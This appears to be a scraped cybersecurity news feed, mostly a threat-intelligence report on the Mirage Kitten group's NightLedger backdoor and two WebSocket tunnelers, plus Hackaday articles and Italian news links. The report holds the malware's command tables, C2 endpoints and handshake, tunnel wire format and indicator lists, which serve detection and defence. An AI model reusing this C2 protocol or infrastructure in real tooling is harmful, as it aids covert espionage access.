@Informatica (Italy e non Italy)
L'Agenzia per la Cybersicurezza europea ha pubblicato le linee guida per gli appalti in ambito sanitario, un settore particolarmente vulnerabile alle minacce informatiche e uno dei più colpiti, specie di questi tempi. Da questo report bene

Cybersecurity & cyberwarfare ha ricondiviso questo.

U.S. CISA adds #Arista #VeloCloud Orchestrator and #Fortinet #FortiOS flaws to its Known Exploited Vulnerabilities catalog
securityaffairs.com/196130/sec…
#securityaffairs #hacking

Mirage Kitten targets Middle East and Africa region with new malware


The media in this post is not displayed to visitors. To view it, please log in.


Introduction


Mirage Kitten – also known as UNC1549, Smoke Sandstorm, and Nimbus Manticore – is an advanced persistent threat (APT) group focused on cyber-espionage operations against aerospace, aviation, defense, and telecommunications sectors across the Middle East and Europe, using highly targeted spear-phishing campaigns, fake recruitment portals, and custom multi-stage malware to gain persistent access and exfiltrate sensitive data.

During recent threat research, we identified a previously undocumented malware set developed and used by Mirage Kitten. The toolset includes NightLedger, a new Windows backdoor for reconnaissance, command execution, file operations, process discovery, and screenshot capture; and two custom WebSocket-based tunnelers, ArcBridge and BridgeHead, for covert network access and operator-controlled tunneling.

Technical details


Although the initial access vector remains unclear for most malware samples observed in this activity, we saw BridgeHead being deployed during post-exploitation activities in victim environments in Egypt and at a Pakistan-based aerospace and aviation organization. The deployment followed targeted spear-phishing activity consistent with tradecraft we recently documented as part of our private threat intelligence reporting service and publicly reported by Unit 42 and Check Point Research, including the use of highly tailored social engineering lures against selected targets. These lures included recruitment-themed content impersonating trusted brands and hiring platforms, as well as lookalike videoconferencing pages that redirected victims to malicious archives hosted on third-party file-sharing services.

NightLedger backdoor


NightLedger is a recently identified Windows backdoor that we attribute to Mirage Kitten based on code and behavioral similarities to the historical implants developed and used by the group. The implant masquerades as SspiCli.dll and appears to be designed for DLL search-order hijacking, targeting a legitimate AppVShNotify.exe binary. While AppVShNotify.exe does not directly import SspiCli.dll, it imports RPCRT4.dll, which can delay-load SspiCli.dll when it invokes an RPC API that requires authentication. This allows a co-located malicious SspiCli.dll to be loaded while forwarding expected exports to the legitimate DLL.

When started, the malicious DLL creates the mutex A8215357-F99A-44FE-BC65-D8F0434B0C03 to enforce a single running instance. If the mutex already exists, it exits immediately.

NightLedger periodically contacts its C2 over HTTPS, issuing an HTTP GET request to the /edfcvfgbhnjmkqwasderfgg endpoint at the realhealthshop[.]com domain, and uses tjconsultingservices[.]com as a fallback C2.

When a valid C2 response is received, the implant tokenizes the payload using the custom delimiter (#%%#) and passes the parsed fields to its command dispatcher. From a development standpoint, this is similar to TWOSTROKE, a backdoor attributed to the same APT and previously documented by GTIG, whose C2 response is hex-encoded and uses (@##@) as a field separator.

NightLedger supports the following commands:

Command IDDescription
1Gather user and host identity information
3Execute a process/program
17List directories
20Download a file to the infected system
25Gather host and network information
27Copy a file
30Update beacon interval
36Take a screenshot
43Load a DLL
56Kill a process
62Delete a file
69Terminate thread
70Upload file to C2 server via POST request to /qasxcdfvgbhnmyuioplkhnj
75Enumerate logical drives
90List processes
93Collect C:\Windows\debug\NetSetup.log together with process-list output.
NetSetup.log is a Windows diagnostic log generated under C:\Windows\debug\ during domain/workgroup join, unjoin, and related network setup operations.

Command output is returned to the C2 via an HTTP POST request to /wsdefvvbnhyuijkplmbgfrtt.

BridgeHead – a WebSocket tunneler


During our investigation, we encountered a tunnel proxy deployed as unbcl.dll in the %LocalAppData%\Microsoft\VisualStudio directory on a machine in Egypt. We also identified a similar deployment in a Pakistan-based environment, where the tunneling tool was stored as C:\program files (x86)\univpn\promote\libwinpthread-1.dll. The malware dynamically loads advapi32.dll, resolves GetUserNameA, retrieves the current Windows username, converts it to lowercase, and searches for a specific substring in it. This behavior suggests prior reconnaissance was performed within the internal network and the username check is needed to make sure it runs on a specific machine. This is potentially intended to prevent execution of the standalone malware sample inside virtual analysis systems. If the substring is not found, the function returns silently without activating.

If the username check was successful, the tunneler establishes an HTTPS WebSocket connection as follows:
GET /connect HTTP/1.1
Host: smartconnect.azurewebsites.net
Upgrade: websocket
Connection: Upgrade
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 Edg/86.0.622.38
The server responds with HTTP 101 (Switching Protocols) to complete the WebSocket upgrade. After the upgrade, the client sends a binary WebSocket message containing the literal string "token" as authentication. The server must respond within 10 seconds, or the connection is dropped and retried with exponential backoff.

The malware’s next action depends on the HTTP response returned by the server:

HTTP responseDescription
407 (Proxy Auth Required)Queries supported auth schemes via WinHttpQueryAuthSchemes, selects Negotiate (0x10) or NTLM (0x2) in that exact order, sets Windows SSO credentials (null username/password), retries up to 3 times.
101 (Switching Protocols)Success. Proceeds to WebSocket upgrade and authentication.
OtherConnection failed. Closes all handles, enters backoff.

This implementation closely mirrors the enterprise proxy traversal logic seen in the backdoor we track internally as Retrograde, which overlaps with tooling publicly reported as MiniFast/MiniUpdate, attributed to the same APT group. The implant is designed to operate through corporate proxy environments by handling HTTP 407 responses, negotiating Windows-integrated proxy authentication with Negotiate preferred over NTLM, retrying with the current user’s SSO context, and falling back to exponential C2 connection retry logic capped at 60 seconds.

Once the WebSocket channel is established and authenticated, the implant functions as a full SOCKS5 tunnel proxy. The C2 server initiates all tunnel connections by sending binary commands over the WebSocket; the implant simply forwards traffic between server‑specified targets and the WebSocket channel. This makes it a relay node: the operator runs tools server‑side, and all resulting TCP traffic is tunneled through the victim’s machine as if originating from the victim’s network.

All tunnel communication uses a fixed binary wire format:

OffsetSizeFieldEncoding
01typeMessage type (1–9)
14connIdTunnel connection identifier
51flagsStatus or error indicator
62dataLenPayload length
8varpayloadMessage data

Every message is at least 8 bytes. Seven message types are actively used:

TypeNameDirectionDescription
1CONNECTServer -> ClientOpen a new TCP tunnel to a SOCKS5 target address
2CONNECT_RESPONSEClient -> ServerConfirm the connection was established
3DATABidirectionalRelay TCP traffic through the tunnel
4DISCONNECTBidirectionalClose a tunnel connection
5PINGBidirectionalKeepalive probe, sent every 30 seconds by timer
6PONGBidirectionalKeepalive reply
9FLOWCTRLBidirectionalThrottle data flow to prevent buffer overrun

The CONNECT payload specifies where the implant should open a TCP connection. The target address is encoded in SOCKS5 format and consists of a single type byte, followed by the address and a 2-byte destination port:

Type byteDescription
0x01IPv4 address (4 bytes)
0x03Domain name (1-byte length + string)
0x04IPv6 address (16 bytes)

Notably, in the process of threat hunting, we detected another variant (MD5: C832ECD135781B11F59E3FFFB3D2B6AC) that shares the same dynamic-resolve stub pattern. This variant communicates with businessmixture.com/blog over WSS on port 443, and not through Microsoft Azure. Still, it implements the same technique of limiting execution to a specific username on the infected machine by hardcoding a 3-character control value that must appear as a substring in the lowercased Windows username retrieved via GetUserNameA. If the match fails, the implant silently exits, confirming per-target tailoring of each deployed binary.

ArcBridge: another WebSocket tunneling tool


ArcBridge is another WebSocket tunneling tool developed and used by Mirage Kitten. We first identified it in April 2026 in activity targeting victims in the Middle East. The malware creates a mutex named F56E68DA-4A89-46B4-9AC8-7290A7651000 to enforce single-instance execution. The use of a UUID-like mutex name is consistent with the NightLedger backdoor described earlier.
The malware contains an embedded configuration block that stores the C2 host, C2 port, retry or timeout value, SSL flag, and what is highly likely an implant identifier:
"<<STARTXX>>"
"aecert.org"
443
5000
0
"4B8CC395-A26F-41F1-A1DC-8B993D9D41D2"
"<<ENDXX>>"
After initialization, ArcBridge communicates over a WebSocket-style channel and waits for server-side control messages. It supports the following commands:

CommandDescription
OPEN:Creates a proxy/tunnel session to a target selected by the operator.
DNS:Performs hostname or address resolution and returns the result.

Victimology


According to our telemetry, we identified victims across Middle East and African countries including Egypt, SMB and government environments in Jordan and Tanzania, aviation organizations in Pakistan, telecommunication companies in Ethiopia and financial-sector entities in Burkina Faso.

Conclusion


Mirage Kitten continues to evolve its malware arsenal to support targeted cyber-espionage operations across the Middle East and Africa regions. The NightLedger backdoor retains similar core command functionality to TWOSTROKE while introducing additional capabilities, including screenshot capture and collection of the NetSetup.log file.

Another notable aspect of the campaign is the group’s continued reliance on tunneling utilities as part of its operational toolkit. This aligns with previous public reporting, which documented the group’s use of the LIGHTRAIL and POLLBLEND tunnelers. Consistent with this tradecraft, we observed Mirage Kitten continuing to leverage tunneling capabilities alongside a gradual shift away from Microsoft Azure subdomain-style infrastructure in favor of Cloudflare-backed domains in some of its malware, a change likely intended to complicate attribution while maintaining resilient command-and-control communications.

Indicators of compromise


Additional IoCs are available to customers of our Threat Intelligence Reporting service. For more details, contact us at intelreports@kaspersky.com.

File hashes


NightLedger backdoor
A239E655709A2518DD0B7BDBED163679 – sspicli.dll

ArcBridge WebSocket tunneling tool
5FA15EF96808EA82F0A6176F0BB4B386
42F847597109DA2A220391BB09D00676
AFB1C1583606599C7272CFB33CC6F498

BridgeHead WebSocket tunneling tool
6038D42AF0AFFD1FB263F470C0956F6B – unbcl.dll
AE628EFA305387B633DCE82F9364875B – unbcl.dll
F7D36CC5904A53252D2BB3D21615134F – libwinpthread-1.dll
C90F0EFADBF322E5EB1C4103A38C30E6 – libwinpthread-1.dll
D09B14A2FE01C7363ECC56F5D046162C – IPHLPAPI.dll

Domains and IPs


smartconnect[.]azurewebsites[.]net
businessmixture[.]com
global-reds[.]com
maadinglobal[.]com
Business-deegital[.]com
business-deegital[.]azurewebsites[.]net
businessdeegital[.]azurewebsites[.]net
neexportfolio[.]azurewebsites[.]net
neexportfolio[.]com
neexportfolio[.]eastus[.]cloudapp[.]azure[.]com
172[.]86[.]98[.]113
aecert[.]org
realhealthshop[.]com
tjconsultingservices[.]com
thehealth-life[.]com
buisness-centeral-transportation[.]com
healthcarezoom-centeral[.]azurewebsites[.]net
healthcarezoomcenteral[.]azurewebsites[.]net
healthcarezoomcenteral[.]org
toadreport[.]azurewebsites[.]net
business-startup[.]azurewebsites[.]net
businessstartup[.]azurewebsites[.]net


securelist.com/mirage-kitten-n…

The Orphaned Sources At The Hacker Camp: What Happened Next


The media in this post is not displayed to visitors. To view it, please log in.

At the 2024 Electromagnetic Field event in the UK, some awkward items turned up at the swap meet: radioactive sources. Fortunately there was [Tryst] at hand, who works in the nuclear industry, so they were safely collected. At this year’s EMF he was back, with a talk about what happened next.

It seems they were an industrial version of the smoke detectors we’ll all be familiar with, containing the same Americium alpha emitters, but in greater quantity. Their path from industry to hacker camp is purposefully shrouded in mystery to avoid future incidents happening because people are scared to come forward, but it seems that but for a bit of post-Brexit regulatory chaos they would normally have been taken back by their Danish manufacturer for disposal.

We’re treated to a fascinating deep dive into radioactive source regulation and just what these sources are. In short, they’re not too dangerous as they are, but what makes them a worry is that they can easily be dismantled and their contents released. Ingestion of alpha particle emitters is a particular worry, so they must be kept safe and accounted for. Which leaves [Tryst] with a set of radioactive sources that sit in a regulatory grey area and can’t easily be disposed of. He ends by asking for suggestions as to how they might be used, of which we favor a true random number generator.

Light-hearted interludes aside, this is a cautionary tale for all of us who delight in digging through technological junk, and we are lucky that our community includes people with the expertise to do something about items like these. The full talk is below the break.

media.ccc.de/v/emf2026-46-1-th…


hackaday.com/2026/07/28/the-or…

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

E’ l’era del sistemista copia-incolla è arrivata! l’IA crea una generazione di operatori che eseguono senza capire

📌 Link all'articolo : redhotcyber.com/post/e-lera-de…

Luca Galuppi

#redhotcyber #cybersecurity #cybercrime #hacking #cti #ai #privacy #news #technology

reshared this

Cybersecurity & cyberwarfare ha ricondiviso questo.

La storia dell’hacker che ha cancellato l’intero catasto rumeno per ripicca

Ha rubato i dati del catasto e ha chiesto il riscatto ma, quando il governo si è rifiutato di pagare, il cybercriminale ha cancellato l'intero archivio rumeno paralizzando il mercato immobiliare

open.online/2026/07/27/catasto…

@informatica

reshared this

Cybersecurity estiva: 10 consigli + furto dello smartphone + furto del computer


The media in this post is not displayed to visitors. To view it, please log in.

Come garantire la personal continuity e affrontare senza problemi il rischio di un furto dello smartphone o del portatile? In questo audio dieci consigli e il commento di alcuni scenari reali.


zerodays.podbean.com/e/cyberse…

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

384 – QUANDO HA TOLTO L’INTELLIGENZA ARTIFICIALE, I VOTI SONO CROLLATI DEL 50% camisanicalzolari.it/384-quand…
Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Microsoft punta l’Europa: come si legge l’accordo con Mistral per il potenziamento dell’AI europea

📌 Link all'articolo : redhotcyber.com/post/microsoft…

Carolina Vivianti

#redhotcyber #cybersecurity #cybercrime #hacking #cti #ai #privacy #news #technology

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Quando il cyberattacco si trasforma in responsabilità penale e amministrativa per i vertici aziendali

📌 Link all'articolo : redhotcyber.com/post/quando-il…

Paolo Galdieri

#redhotcyber #cybersecurity #cybercrime #hacking #cti #ai #privacy #news #technology

De-Aging Human Tissue Using Special Enzyme to Remove AGEs


The media in this post is not displayed to visitors. To view it, please log in.

With human bodies being bags of mostly salty water and countless messy biochemical processes, it’s little wonder that over time some residues tend to collect in these systems. Although evolution has seen fit to also evolve a range of mechanisms to clean up many of those messes, some of these waste products are left to gather, such as advanced glycation end-products (AGEs). Implicated in everything from diabetes to chronic kidney disease and general aging-related conditions, recently researchers have developed a way to break down one type of these AGEs.

Called N(6)-Carboxymethyllysine (CML), there is evidence to suggest that the presence of AGEs like it in the extracellular matrix (ECM) has damaging effects on the ECM’s functioning, as observed in e.g. the inhibiting of collagen crosslinking and the resulting ‘aging’ of skin among other tissues. Essentially these waste product jam up the normal biochemical machinery, while also triggering pro-inflammatory factors.

Beyond aging-related conditions, this can result in a whole range of other diseases that may be resolved if these waste products could be cleaned out. To this end [Narisa Trabosh] et al. of the San Francisco-based Revel Pharmaceuticals laboratory created CMLase, an enzyme that breaks down CML.
Arterial tissue treated with the CMLase enzyme shows a clear difference. (Credit: Trabosh et al., Nature communications, 2026)Arterial tissue treated with the CMLase enzyme shows a clear difference. (Credit: Trabosh et al., Nature communications, 2026)
The challenge here was to design this enzyme, which used a genetic selection approach in modified E. coli to narrow down suitable enzymes, optimized for dealing with free CML. Once they were fairly confident that they had a working enzyme, they had to test it and observe the results.

This testing was performed in model proteins in vitro, as well as in tissue samples from elderly donors. These latter included lens, skin and arterial tissue, all of which are long-lived tissues that have plenty of time to collect CML. After treatment with CMLase the presence of CML in these tissues was reduced by 55% for skin and 75% for arterial tissue.

Of course, as also noted in the article these are ex vivo experiments that do not yet directly translate to living patients. An initial human trial would need to show safety above all, even if the amount of waste produced by the clean-up of CML won’t be that significant.

Subsequent trials would need to demonstrate that such removal of CML leads to healthier tissues, which if confirmed would open the path for other pathogenic AGEs to get their own matching enzyme.


hackaday.com/2026/07/27/de-agi…

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Exploit pubblico per vBulletin: codice PHP eseguibile da remoto senza autenticazione

📌 Link all'articolo : redhotcyber.com/post/exploit-p…

Luigi Zullo

#redhotcyber #cybersecurity #cybercrime #hacking #cti #ai #privacy #news #technology

reshared this

A Labour Of Love Brings A Kids Book To The Spectrum


The media in this post is not displayed to visitors. To view it, please log in.

Back in the early 1980s when 8-bit home computers became affordable educational toys for children, the traditional paper publishing industry did its best to keep up. For a few brief years, there were children’s books dedicated to the innards of a computer in meticulous detail, and courtesy of [Jason Jacques] we have a chance to look at one of the lesser-known ones.

The British publisher Ladybird made a series of four computer books, and while the first three had content for both the Sinclair Spectrum and the BBC Micro, the last in the series only featured the BBC. [Jason] took that book and re-imagined the missing Sinclair Spectrum version.

The surprise is how deep it dives into the architecture of an 8-bit computer, and it’s refreshing to see something that’s not unduly dumbed-down for kids. We’re guessing that this would have appealed to the 5% of kids who ran with their computers rather than just playing Jet Set Willy back then, and we’re sure a few grown-up 50-somethings may remember it or books like it.

If you think you may have seen Ladybird books here before, it may be because we reviewed another influential tech book of theirs for kids. Meanwhile you can take a look at the contemporary computer books from their arch-rival Usborne.


hackaday.com/2026/07/27/a-labo…

Cybersecurity & cyberwarfare ha ricondiviso questo.

Citiverse aggiornato alla versione v4.14.2

Da ieri sera Citiverse è aggiornato alla versione 4.14.2.

Siamo passati dalla 4.14.0 alla 4.14.2 quindi per il changelog bisogna guardare anche quello della 4.14.1. Ve li lascio entrambi:

v4.14.1
v4.14.2

Ne approfitto anche per segnalare che dovremmo finalmente aver risolto un problema che ci portavamo dietro da qualche settimana e che non permetteva la federazione corretta con Feddit e con altri server del Fediverso! 🔥

Questa voce è stata modificata (3 giorni fa)
Cybersecurity & cyberwarfare ha ricondiviso questo.

New spyware mystery just dropped:

AngrySpark spyware, used against one target in the UK: medium.com/@billmarczak/an-ang…

Some infrastructure overlaps with Operation Triangulation against Kaspersky: medium.com/@billmarczak/an-ang…

reshared this

Re-Testing an Apollo Guidance Computer Module that Failed Certification Testing


The media in this post is not displayed to visitors. To view it, please log in.

After getting his hands on a rope driver module from the Apollo project era that had a big ‘Scrapped Module’ stamped on it, [Mike Stewart] was naturally left curious as to what exactly had failed in this module. Originally destined for the Apollo Guidance Computer, these Raytheon-manufactured modules were the pinnacle of space-grade high-tech of the 1960s, with requisite acceptance testing so as to not endanger a very expensive space mission.

The cool part here is that the acceptance documents for the module in question (B16-B17) have been scanned in and can be found on the Internet Archive. With the part itself being potted and very much inaccessible, this document helpfully lays out the expected measurements on the module’s pins, as well as schematics and mechanical drawings. Unfortunately the reasons for the rejection were not recorded, so replicating the failing test results is required to understand the reason.
NASA Rope Driver Module with suspicious exploration marks. (Credit: Mike Stewart, YouTube)NASA Rope Driver Module with suspicious exploration marks. (Credit: Mike Stewart, YouTube)
A slight complication here is that the testing procedure doesn’t just involve hooking up a multimeter for some voltage and capacitance measurements. There are also temperature and voltage extremes, and vibration tolerance involved, which would be somewhat complex to test, but most of all risk damaging a historical artefact. Thus a somewhat conservative testing procedure was chosen, even if this may not reveal the actual fault.

As noted in the video, sometimes modules were also rejected because someone simply dropped it on the floor along the way. However, generally if a module was found to be faulty they would open it to diagnose said fault, with a closer look at this module indeed revealing suspicious marks in the potting compound where it was apparently opened and conceivably repaired. This also might explain why they also put the ‘For engineering use only’ on it.

With multiple of such locations visible in the potting compound, these locations were mapped to the schematics for the module, to get some idea of what may have been accessed. After this, basic testing was performed on the module, as per the acceptance testing document.

Along the way an error was detected in said document, in the form of the wrong pin number. In table 4-2 the input pin 269 was mistakenly listed as having output pin number 169 when it should have been pin 168. Pin 169 is chassis ground, so this was presumably fixed in a later version of the document.

After all the testing with just stationary, room-temperature conditions, everything appeared to check out. This means that likely this was indeed a repaired module that got subsequently used for engineering purposes rather than installed in flight-ready hardware. The only issue found was that channels were out of calibration, but whether this was an original flaw or due to the module being half a century old is hard to tell in the absence of repair logs.

Overall it’s an exciting opportunity to document another part of history, since so many of the details pertaining to these original modules and related technologies got lost or muddled over the decades.

youtube.com/embed/-VzQMX-DoDI?…


hackaday.com/2026/07/27/re-tes…